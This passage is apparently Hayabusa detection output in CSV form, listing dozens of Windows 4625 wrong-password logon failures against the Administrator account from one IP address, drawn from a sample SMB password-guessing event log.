2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.917 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.426 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.924 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.649 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.189 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.754 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: 
